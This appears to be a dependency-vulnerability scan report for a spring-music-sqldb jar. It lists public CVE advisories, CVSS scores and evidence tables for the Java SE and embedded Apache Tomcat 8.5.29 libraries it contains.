Vulnerability in the Java SE, Java SE Embedded component of Oracle Java SE (subcomponent: RMI). Supported versions that are affected are Java SE: 7u211, 8u202, 11.0.2 and 12; Java SE Embedded: 8u201. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.0 Base Score 5.9 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N). NVD-CWE-noinfo
CVSSv3: Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
References:
Vulnerable Software & Versions:
CVE-2021-24122
When serving resources from a network location using the NTFS file system, Apache Tomcat versions 10.0.0-M1 to 10.0.0-M9, 9.0.0.M1 to 9.0.39, 8.5.0 to 8.5.59 and 7.0.0 to 7.0.106 were susceptible to JSP source code disclosure in some configurations. The root cause was the unexpected behaviour of the JRE API File.getCanonicalPath() which in turn was caused by the inconsistent behaviour of the Windows API (FindFirstFileW) in some circumstances. CWE-706 Use of Incorrectly-Resolved Name or Reference, CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
CVSSv3: Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N
References:
Vulnerable Software & Versions:
CVE-2021-33037
Apache Tomcat 10.0.0-M1 to 10.0.6, 9.0.0.M1 to 9.0.46 and 8.5.0 to 8.5.66 did not correctly parse the HTTP transfer-encoding request header in some circumstances, leading to the possibility of request smuggling when used with a reverse proxy. Specifically:
- Tomcat incorrectly ignored the transfer-encoding header if the client declared it would only accept an HTTP/1.0 response;
- Tomcat honoured the identity encoding; and
- Tomcat did not ensure that, if present, the chunked encoding was the final encoding.
CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3: Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N
References:
Vulnerable Software & Versions:
CVE-2023-42795
Incomplete Cleanup vulnerability in Apache Tomcat. When recycling various internal objects in Apache Tomcat from 11.0.0-M1 through 11.0.0-M11, from 10.1.0-M1 through 10.1.13, from 9.0.0-M1 through 9.0.80 and from 8.5.0 through 8.5.93, an error could cause Tomcat to skip some parts of the recycling process, leading to information leaking from the current request/response to the next.
Users are recommended to upgrade to version 11.0.0-M12 onwards, 10.1.14 onwards, 9.0.81 onwards or 8.5.94 onwards, which fixes the issue. CWE-459 Incomplete Cleanup
CVSSv3: Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:3.9/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2023-45648
Improper Input Validation vulnerability in Apache Tomcat. Tomcat from 11.0.0-M1 through 11.0.0-M11, from 10.1.0-M1 through 10.1.13, from 9.0.0-M1 through 9.0.81 and from 8.5.0 through 8.5.93 did not correctly parse HTTP trailer headers. A specially crafted, invalid trailer header could cause Tomcat to treat a single request as multiple requests, leading to the possibility of request smuggling when behind a reverse proxy.
Users are recommended to upgrade to version 11.0.0-M12 onwards, 10.1.14 onwards, 9.0.81 onwards or 8.5.94 onwards, which fix the issue. CWE-20 Improper Input Validation, NVD-CWE-Other
CVSSv3: Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:3.9/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2024-21733
Generation of Error Message Containing Sensitive Information vulnerability in Apache Tomcat. This issue affects Apache Tomcat: from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43.
Users are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue. CWE-209 Generation of Error Message Containing Sensitive Information
CVSSv3: Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:3.9/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2020-1935
In Apache Tomcat 9.0.0.M1 to 9.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99 the HTTP header parsing code used an approach to end-of-line parsing that allowed some invalid HTTP headers to be parsed as valid. This led to a possibility of HTTP Request Smuggling if Tomcat was located behind a reverse proxy that incorrectly handled the invalid Transfer-Encoding header in a particular manner. Such a reverse proxy is considered unlikely. CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3: Base Score: MEDIUM (4.8) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (5.8) Vector: /AV:N/AC:M/Au:N/C:P/I:P/A:N
References:
Vulnerable Software & Versions:
CVE-2018-11784
When the default servlet in Apache Tomcat versions 9.0.0.M1 to 9.0.11, 8.5.0 to 8.5.33 and 7.0.23 to 7.0.90 returned a redirect to a directory (e.g. redirecting to '/foo/' when the user requested '/foo'), a specially crafted URL could be used to cause the redirect to be generated to any URI of the attacker's choice. CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
CVSSv3: Base Score: MEDIUM (4.3) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N/E:2.8/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N
References:
Vulnerable Software & Versions:
CVE-2020-13943
If an HTTP/2 client connecting to Apache Tomcat 10.0.0-M1 to 10.0.0-M7, 9.0.0.M1 to 9.0.37 or 8.5.0 to 8.5.57 exceeded the agreed maximum number of concurrent streams for a connection (in violation of the HTTP/2 protocol), it was possible that a subsequent request made on that connection could contain HTTP headers - including HTTP/2 pseudo headers - from a previous request rather than the intended headers. This could lead to users seeing responses for unexpected resources. NVD-CWE-noinfo
CVSSv3: Base Score: MEDIUM (4.3) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:2.8/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (4.0) Vector: /AV:N/AC:L/Au:S/C:P/I:N/A:N
References:
Vulnerable Software & Versions:
CVE-2023-28708
When using the RemoteIpFilter with requests received from a reverse proxy via HTTP that include the X-Forwarded-Proto header set to https, session cookies created by Apache Tomcat 11.0.0-M1 to 11.0.0-M2, 10.1.0-M1 to 10.1.5, 9.0.0-M1 to 9.0.71 and 8.5.0 to 8.5.85 did not include the secure attribute. This could result in the user agent transmitting the session cookie over an insecure channel. CWE-523 Unprotected Transport of Credentials
CVSSv3: Base Score: MEDIUM (4.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N/E:2.8/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2021-43980
The simplified implementation of blocking reads and writes introduced in Tomcat 10 and back-ported to Tomcat 9.0.47 onwards exposed a long standing (but extremely hard to trigger) concurrency bug in Apache Tomcat 10.1.0 to 10.1.0-M12, 10.0.0-M1 to 10.0.18, 9.0.0-M1 to 9.0.60 and 8.5.0 to 8.5.77 that could cause client connections to share an Http11Processor instance resulting in responses, or part responses, to be received by the wrong client. CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
CVSSv3: Base Score: LOW (3.7) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N/E:2.2/RC:R/MAV:A
References:
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: tomcat-embed-el-8.5.29.jar
Description: Core Tomcat implementation
License: Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/tomcat-embed-el-8.5.29.jar
MD5: 90ad99f3af6b4486e146395dece7171b
SHA1: 893fb2c87ec1aa248a7911d76c0c06b3fca6bc9b
SHA256: fbcc56e655f22f3c375b0719e08a34cad4289b6b4f79d97da3cb3029ca9f9511
Evidence
Type | Source | Name | Value | Confidence
Vendor | central | artifactid | tomcat-embed-el | Highest
Vendor | central | groupid | org.apache.tomcat.embed | Highest
Vendor | file | name | tomcat-embed-el | High
Vendor | jar | package name | apache | Highest
Vendor | jar | package name | apache | Low
Vendor | jar | package name | el | Low
Vendor | Manifest | Implementation-Vendor | Apache Software Foundation | High
Vendor | Manifest | specification-vendor | Apache Software Foundation | Low
Vendor | pom | artifactid | tomcat-embed-el | Low
Vendor | pom | groupid | org.apache.tomcat.embed | Highest
Vendor | pom | url | http://tomcat.apache.org/ | Highest
Product | central | artifactid | tomcat-embed-el | Highest
Product | file | name | tomcat-embed-el | High
Product | jar | package name | apache | Highest
Product | jar | package name | el | Low
Product | Manifest | Implementation-Title | Apache Tomcat | High
Product | Manifest | specification-title | Apache Tomcat | Medium
Product | pom | artifactid | tomcat-embed-el | Highest
Product | pom | groupid | org.apache.tomcat.embed | Highest
Product | pom | url | http://tomcat.apache.org/ | Medium
Version | central | version | 8.5.29 | Highest
Version | file | version | 8.5.29 | High
Version | Manifest | Implementation-Version | 8.5.29 | High
Version | pom | version | 8.5.29 | Highest
spring-music-sqldb-1.0.jar: tomcat-embed-websocket-8.5.29.jar
Description: Core Tomcat implementation
License: Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/tomcat-embed-websocket-8.5.29.jar
MD5: 71d21947758dd569b676b6880540a33b
SHA1: 37786f4ca8a1597a91a0f437e659a76d1fcc5bf1
SHA256: 64b542d14547f8919715e66896af659fdd4b64842f3c566be234fc9170023528
Evidence
Type | Source | Name | Value | Confidence
Vendor | central | artifactid | tomcat-embed-websocket | Highest
Vendor | central | groupid | org.apache.tomcat.embed | Highest
Vendor | file | name | tomcat-embed-websocket | High
Vendor | jar | package name | apache | Highest
Vendor | jar | package name | apache | Low
Vendor | jar | package name | tomcat | Low
Vendor | jar | package name | websocket | Low
Vendor | Manifest | Implementation-Vendor | Apache Software Foundation | High
Vendor | Manifest | specification-vendor | Apache Software Foundation | Low
Vendor | pom | artifactid | tomcat-embed-websocket | Low
Vendor | pom | groupid | org.apache.tomcat.embed | Highest
Vendor | pom | url | http://tomcat.apache.org/ | Highest
Product | central | artifactid | tomcat-embed-websocket | Highest
Product | file | name | tomcat-embed-websocket | High
Product | jar | package name | apache | Highest
Product | jar | package name | tomcat | Highest
Product | jar | package name | tomcat | Low
Product | jar | package name | websocket | Low
Product | Manifest | Implementation-Title | Apache Tomcat | High
Product | Manifest | specification-title | Apache Tomcat | Medium
Product | pom | artifactid | tomcat-embed-websocket | Highest
Product | pom | groupid | org.apache.tomcat.embed | Highest
Product | pom | url | http://tomcat.apache.org/ | Medium
Version | central | version | 8.5.29 | Highest
Version | file | version | 8.5.29 | High
Version | Manifest | Implementation-Version | 8.5.29 | High
Version | pom | version | 8.5.29 | Highest
CVE-2018-8014
The default settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue. CWE-1188 Insecure Default Initialization of Resource
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References:
Vulnerable Software & Versions:
CVE-2020-1938
CISA Known Exploited Vulnerability:
Product: Apache Tomcat
Name: Apache Tomcat Improper Privilege Management Vulnerability
Date Added: 2022-03-03
Description: Apache Tomcat treats Apache JServ Protocol (AJP) connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited.
Required Action: Apply updates per vendor instructions.
Due Date: 2022-03-17
Notes: https://nvd.nist.gov/vuln/detail/CVE-2020-1938
When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed:
- returning arbitrary files from anywhere in the web application
- processing any file in the web application as a JSP
Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations. NVD-CWE-Other
CVSSv3: Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References:
Vulnerable Software & Versions:
CVE-2022-25762
If a web application sends a WebSocket message concurrently with the WebSocket connection closing when running on Apache Tomcat 8.5.0 to 8.5.75 or Apache Tomcat 9.0.0.M1 to 9.0.20, it is possible that the application will continue to use the socket after it has been closed. The error handling triggered in this case could cause a pooled object to be placed in the pool twice. This could result in subsequent connections using the same object concurrently, which could result in data being returned to the wrong user and/or other errors. CWE-404 Improper Resource Shutdown or Release
CVSSv3: Base Score: HIGH (8.6) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References:
Vulnerable Software & Versions:
CVE-2019-0232
When running on Windows with enableCmdLineArguments enabled, the CGI Servlet in Apache Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 is vulnerable to Remote Code Execution due to a bug in the way the JRE passes command line arguments to Windows. The CGI Servlet is disabled by default. The CGI option enableCmdLineArguments is disabled by default in Tomcat 9.0.x (and will be disabled by default in all versions in response to this vulnerability). For a detailed explanation of the JRE behaviour, see Markus Wulftange's blog (https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html) and this archived MSDN blog (https://web.archive.org/web/20161228144344/https://blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/). CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVSSv3: Base Score: HIGH (8.1) Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:2.2/RC:R/MAV:A
CVSSv2: Base Score: HIGH (9.3) Vector: /AV:N/AC:M/Au:N/C:C/I:C/A:C
References:
Vulnerable Software & Versions:
CVE-2020-8022
An Incorrect Default Permissions vulnerability in the packaging of tomcat on SUSE Enterprise Storage 5, SUSE Linux Enterprise Server 12-SP2-BCL, SUSE Linux Enterprise Server 12-SP2-LTSS, SUSE Linux Enterprise Server 12-SP3-BCL, SUSE Linux Enterprise Server 12-SP3-LTSS, SUSE Linux Enterprise Server 12-SP4, SUSE Linux Enterprise Server 12-SP5, SUSE Linux Enterprise Server 15-LTSS, SUSE Linux Enterprise Server for SAP 12-SP2, SUSE Linux Enterprise Server for SAP 12-SP3, SUSE Linux Enterprise Server for SAP 15, SUSE OpenStack Cloud 7, SUSE OpenStack Cloud 8, SUSE OpenStack Cloud Crowbar 8 allows local attackers to escalate from group tomcat to root. This issue affects:
- SUSE Enterprise Storage 5 tomcat versions prior to 8.0.53-29.32.1.
- SUSE Linux Enterprise Server 12-SP2-BCL tomcat versions prior to 8.0.53-29.32.1.
- SUSE Linux Enterprise Server 12-SP2-LTSS tomcat versions prior to 8.0.53-29.32.1.
- SUSE Linux Enterprise Server 12-SP3-BCL tomcat versions prior to 8.0.53-29.32.1.
- SUSE Linux Enterprise Server 12-SP3-LTSS tomcat versions prior to 8.0.53-29.32.1.
- SUSE Linux Enterprise Server 12-SP4 tomcat versions prior to 9.0.35-3.39.1.
- SUSE Linux Enterprise Server 12-SP5 tomcat versions prior to 9.0.35-3.39.1.
- SUSE Linux Enterprise Server 15-LTSS tomcat versions prior to 9.0.35-3.57.3.
- SUSE Linux Enterprise Server for SAP 12-SP2 tomcat versions prior to 8.0.53-29.32.1.
- SUSE Linux Enterprise Server for SAP 12-SP3 tomcat versions prior to 8.0.53-29.32.1.
- SUSE Linux Enterprise Server for SAP 15 tomcat versions prior to 9.0.35-3.57.3.
- SUSE OpenStack Cloud 7 tomcat versions prior to 8.0.53-29.32.1.
- SUSE OpenStack Cloud 8 tomcat versions prior to 8.0.53-29.32.1.
- SUSE OpenStack Cloud Crowbar 8 tomcat versions prior to 8.0.53-29.32.1.
CWE-276 Incorrect Default Permissions
CVSSv3: Base Score: HIGH (7.8) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:1.8/RC:R/MAV:A
CVSSv2: Base Score: HIGH (7.2) Vector: /AV:L/AC:L/Au:N/C:C/I:C/A:C
References:
Vulnerable Software & Versions:
CVE-2018-1336
An improper handling of overflow in the UTF-8 decoder with supplementary characters can lead to an infinite loop in the decoder, causing a Denial of Service. Versions Affected: Apache Tomcat 9.0.0.M9 to 9.0.7, 8.5.0 to 8.5.30, 8.0.0.RC1 to 8.0.51, and 7.0.28 to 7.0.86. CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
References:
Vulnerable Software & Versions:
CVE-2018-8034
The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default. Versions Affected: Apache Tomcat 9.0.0.M1 to 9.0.9, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, and 7.0.35 to 7.0.88. CWE-295 Improper Certificate Validation
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:P/I:N/A:N
References:
Vulnerable Software & Versions:
CVE-2019-0199
The HTTP/2 implementation in Apache Tomcat 9.0.0.M1 to 9.0.14 and 8.5.0 to 8.5.37 accepted streams with excessive numbers of SETTINGS frames and also permitted clients to keep streams open without reading/writing request/response data. By keeping streams open for requests that utilised the Servlet API's blocking I/O, clients were able to cause server-side threads to block eventually leading to thread exhaustion and a DoS. CWE-400 Uncontrolled Resource Consumption
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2019-10072
The fix for CVE-2019-0199 was incomplete and did not address HTTP/2 connection window exhaustion on write in Apache Tomcat versions 9.0.0.M1 to 9.0.19 and 8.5.0 to 8.5.40. By not sending WINDOW_UPDATE messages for the connection window (stream 0) clients were able to cause server-side threads to block eventually leading to thread exhaustion and a DoS.
CWE-667 Improper Locking
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
References:
Vulnerable Software & Versions:
CVE-2019-17563
When using FORM authentication with Apache Tomcat 9.0.0.M1 to 9.0.29, 8.5.0 to 8.5.49 and 7.0.0 to 7.0.98 there was a narrow window where an attacker could perform a session fixation attack. The window was considered too narrow for an exploit to be practical but, erring on the side of caution, this issue has been treated as a security vulnerability.
CWE-384 Session Fixation
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H/E:1.6/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (5.1) Vector: /AV:N/AC:H/Au:N/C:P/I:P/A:P
References: entries from af854a3a-2127-422b-91ae-364da2661108 and security@apache.org tagged MAILING_LIST, PATCH, THIRD_PARTY_ADVISORY and VENDOR_ADVISORY (reference URLs not preserved in this extraction)
Vulnerable Software & Versions:
CVE-2020-11996
A specially crafted sequence of HTTP/2 requests sent to Apache Tomcat 10.0.0-M1 to 10.0.0-M5, 9.0.0.M1 to 9.0.35 and 8.5.0 to 8.5.55 could trigger high CPU usage for several seconds. If a sufficient number of such requests were made on concurrent HTTP/2 connections, the server could become unresponsive.
NVD-CWE-noinfo
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
References:
Vulnerable Software & Versions:
CVE-2020-13934
An h2c direct connection to Apache Tomcat 10.0.0-M1 to 10.0.0-M6, 9.0.0.M5 to 9.0.36 and 8.5.1 to 8.5.56 did not release the HTTP/1.1 processor after the upgrade to HTTP/2. If a sufficient number of such requests were made, an OutOfMemoryException could occur leading to a denial of service.
CWE-401 Missing Release of Memory after Effective Lifetime, CWE-476 NULL Pointer Dereference
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
References: entries from af854a3a-2127-422b-91ae-364da2661108 and security@apache.org tagged MAILING_LIST, PATCH, RELEASE_NOTES, THIRD_PARTY_ADVISORY and VENDOR_ADVISORY (reference URLs not preserved in this extraction)
Vulnerable Software & Versions:
CVE-2020-13935
The payload length in a WebSocket frame was not correctly validated in Apache Tomcat 10.0.0-M1 to 10.0.0-M6, 9.0.0.M1 to 9.0.36, 8.5.0 to 8.5.56 and 7.0.27 to 7.0.104. Invalid payload lengths could trigger an infinite loop. Multiple requests with invalid payload lengths could lead to a denial of service.
CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
References: entries from af854a3a-2127-422b-91ae-364da2661108 and security@apache.org tagged MAILING_LIST, NOT_APPLICABLE, PATCH, RELEASE_NOTES, THIRD_PARTY_ADVISORY and VENDOR_ADVISORY (reference URLs not preserved in this extraction)
Vulnerable Software & Versions:
CVE-2020-17527
While investigating bug 64830 it was discovered that Apache Tomcat 10.0.0-M1 to 10.0.0-M9, 9.0.0-M1 to 9.0.39 and 8.5.0 to 8.5.59 could re-use an HTTP request header value from the previous stream received on an HTTP/2 connection for the request associated with the subsequent stream. While this would most likely lead to an error and the closure of the HTTP/2 connection, it is possible that information could leak between requests.
CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:P/I:N/A:N
References: entries from af854a3a-2127-422b-91ae-364da2661108 and security@apache.org tagged MAILING_LIST, PATCH, THIRD_PARTY_ADVISORY and VENDOR_ADVISORY (reference URLs not preserved in this extraction)
Vulnerable Software & Versions:
CVE-2021-25122
When responding to new h2c connection requests, Apache Tomcat versions 10.0.0-M1 to 10.0.0, 9.0.0.M1 to 9.0.41 and 8.5.0 to 8.5.61 could duplicate request headers and a limited amount of request body from one request to another meaning user A and user B could both see the results of user A's request.
CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:P/I:N/A:N
References: entries from af854a3a-2127-422b-91ae-364da2661108 and security@apache.org tagged MAILING_LIST, PATCH, THIRD_PARTY_ADVISORY and VENDOR_ADVISORY (reference URLs not preserved in this extraction)
Vulnerable Software & Versions:
CVE-2021-41079
Apache Tomcat 8.5.0 to 8.5.63, 9.0.0-M1 to 9.0.43 and 10.0.0-M1 to 10.0.2 did not properly validate incoming TLS packets. When Tomcat was configured to use NIO+OpenSSL or NIO2+OpenSSL for TLS, a specially crafted packet could be used to trigger an infinite loop resulting in a denial of service.
CWE-20 Improper Input Validation, CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
CVSSv2: Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P
References:
Vulnerable Software & Versions:
CVE-2022-42252
If Apache Tomcat 8.5.0 to 8.5.82, 9.0.0-M1 to 9.0.67, 10.0.0-M1 to 10.0.26 or 10.1.0-M1 to 10.1.0 was configured to ignore invalid HTTP headers via setting rejectIllegalHeader to false (the default for 8.5.x only), Tomcat did not reject a request containing an invalid Content-Length header making a request smuggling attack possible if Tomcat was located behind a reverse proxy that also failed to reject the request with the invalid header.
CWE-444 Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:3.9/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2023-44487
CISA Known Exploited Vulnerability:
Product: IETF HTTP/2
Name: HTTP/2 Rapid Reset Attack Vulnerability
Date Added: 2023-10-10
Description: HTTP/2 contains a rapid reset vulnerability that allows for a distributed denial-of-service attack (DDoS).
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Due Date: 2023-10-31
Notes: This vulnerability affects a common open-source component, third-party library, or protocol used by different products. For more information, please see: HTTP/2 Rapid Reset Vulnerability, CVE-2023-44487 | CISA: https://www.cisa.gov/news-events/alerts/2023/10/10/http2-rapid-reset-vulnerability-cve-2023-44487; https://blog.cloudflare.com/technical-breakdown-http2-rapid-reset-ddos-attack/; https://nvd.nist.gov/vuln/detail/CVE-2023-44487
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.
CWE-400 Uncontrolled Resource Consumption, NVD-CWE-noinfo
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
References: entries from af854a3a-2127-422b-91ae-364da2661108 and cve@mitre.org tagged BROKEN_LINK, EXPLOIT, ISSUE_TRACKING, MAILING_LIST, MITIGATION, PATCH, PRESS/MEDIA_COVERAGE, PRODUCT, RELEASE_NOTES, TECHNICAL_DESCRIPTION, THIRD_PARTY_ADVISORY, US_GOVERNMENT_RESOURCE and VENDOR_ADVISORY (reference URLs not preserved in this extraction)
Vulnerable Software & Versions:
CVE-2023-46589
Improper Input Validation vulnerability in Apache Tomcat. Tomcat from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.1.15, from 9.0.0-M1 through 9.0.82 and from 8.5.0 through 8.5.95 did not correctly parse HTTP trailer headers. A trailer header that exceeded the header size limit could cause Tomcat to treat a single request as multiple requests leading to the possibility of request smuggling when behind a reverse proxy.
Users are recommended to upgrade to version 11.0.0-M11 onwards, 10.1.16 onwards, 9.0.83 onwards or 8.5.96 onwards, which fix the issue.
